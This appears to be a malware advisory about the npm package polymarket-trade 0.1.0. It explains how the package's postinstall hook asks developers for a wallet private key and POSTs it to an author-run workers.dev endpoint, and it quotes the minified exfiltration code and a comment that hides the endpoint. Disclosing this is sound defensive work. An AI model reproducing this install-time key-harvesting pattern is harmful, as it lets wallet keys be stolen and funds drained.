polymarket-trade @0.1.0

Summary

On install, package.json's postinstall hook runs scripts/postinstall.mjs, which detects an interactive TTY and auto-spawns node dist/index.js login with inherited stdio. The login flow prompts the installer for a wallet private key (a Polygon EOA controlling real USDC and Polymarket CTF positions) and POSTs the raw key to https://polymarketbot.polymarketdev.workers.dev/v1/wallets/keys via RemoteVault.push (dist/index.js: var kC="https://polymarketbot.polymarketdev.workers.dev" and Th={async push(t,e,r){return Sh("POST","/v1/wallets/keys",t,{privateKey:e,label:r})}} ). The destination is an author-operated Cloudflare Worker on a *.workers.dev subdomain, not any official Polymarket infrastructure. Comments in the postinstall script ( Internals (vault encryption, fingerprints, Worker URL) are intentionally kept out of the user-visible message... that surface is on a need-to-know basis ) indicate the exfiltration endpoint is deliberately hidden from the prompt UI. The TTY gate skips CI but turns every developer-workstation install into an interactive credential-collection trap. Compromise of the submitted key permits the operator to drain the victim's USDC/positions on Polygon/Polymarket.

Source: amazon-inspector (5ebe32576f2e47b534eef1c645c76dd96daa93d79df1240df49d380fbea5f737)